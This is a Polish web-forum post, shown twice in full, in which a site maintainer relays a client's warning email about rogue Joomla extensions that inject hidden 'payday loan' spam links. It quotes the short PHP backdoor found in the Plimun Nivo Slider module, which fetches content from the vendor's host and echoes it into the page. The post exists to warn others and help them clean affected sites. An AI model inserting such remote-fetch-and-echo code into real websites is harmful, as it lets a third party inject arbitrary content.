noiragneau
09-04-2013, 11:34
Witam, dzisiaj jedna z klientek przesłała mi maila o poniższej treści (dostała je ostatnio 2 razy)
This message is to inform you that you have installed a rogue Joomla extension. This extension contains malicious code that is inserting hidden backlinks into your site.
You won’t be able to see these backlinks when viewing your website because they are hidden with javascript and CSS code. Your search rankings are being affected because Google can see these backlinks and identifies them as spam which is against their policies.
To view the code that the extension is inserting please use “View Source” in Internet Explorer or “View Page Source” in Chrome, or a similar function in your browser, and then search for “payday loan”. You may have to search sub-pages as the extension may not be located on your homepage.
Please Note: The malicious extensions also have the ability to insert whatever code they want into your site, which is a major security hole.
The four main extensions that are affected are:
- Autson Skitter Slideshow
- ShareThis forJoomla!
- Add This for Joomla
- Plimun Nivo Slider
This thread at the Joomla forum describes the vulnerability in detail. It also lists more possible extensions that could be a threat, as well instructions for removing the malicious code: http://forum.joomla.org/viewtopic.php?f=262&t=795946&sid=bf0001b7f12084bce5a31d25d9581d47
Głównie chodzi o to że że powyższe rozszerzenia wyświetlają ukryte linki i ich dostawca może zamieścić swój kod na waszej stronie co wpływa znacznie na bezpieczeństwo. Co więcej moze to zaszkodzić naszej pozycji w Google!
Rzeczywiście na stronie klientki znalazł się ukryty link "payday loan" (moduł Plimun Nivo Slider) a za jego wyświetlanie odpowiedzialny był kod:
<?php
$credit=file_get_contents('http:// www.plimum.com/p.php?i='.$path);
echo $credit;
?>
Usunięcie kodu zlikwidowało problem.
Więcej info http://forum.joomla.org/viewtopic.php?f=262&t=795946&sid=bf0001b7f12084bce5a31d25d9581d47
This message is to inform you that you have installed a rogue Joomla extension. This extension contains malicious code that is inserting hidden backlinks into your site.
You won’t be able to see these backlinks when viewing your website because they are hidden with javascript and CSS code. Your search rankings are being affected because Google can see these backlinks and identifies them as spam which is against their policies.
To view the code that the extension is inserting please use “View Source” in Internet Explorer or “View Page Source” in Chrome, or a similar function in your browser, and then search for “payday loan”. You may have to search sub-pages as the extension may not be located on your homepage.
Please Note: The malicious extensions also have the ability to insert whatever code they want into your site, which is a major security hole.
The four main extensions that are affected are:
- Autson Skitter Slideshow
- ShareThis forJoomla!
- Add This for Joomla
- Plimun Nivo Slider
This thread at the Joomla forum describes the vulnerability in detail. It also lists more possible extensions that could be a threat, as well instructions for removing the malicious code: http://forum.joomla.org/viewtopic.php?f=262&t=795946&sid=bf0001b7f12084bce5a31d25d9581d47
Głównie chodzi o to że że powyższe rozszerzenia wyświetlają ukryte linki i ich dostawca może zamieścić swój kod na waszej stronie co wpływa znacznie na bezpieczeństwo. Co więcej moze to zaszkodzić naszej pozycji w Google!
Rzeczywiście na stronie klientki znalazł się ukryty link "payday loan" (moduł Plimun Nivo Slider) a za jego wyświetlanie odpowiedzialny był kod:
<?php
$credit=file_get_contents('http:// www.plimum.com/p.php?i='.$path);
echo $credit;
?>
Usunięcie kodu zlikwidowało problem.
Więcej info http://forum.joomla.org/viewtopic.php?f=262&t=795946&sid=bf0001b7f12084bce5a31d25d9581d47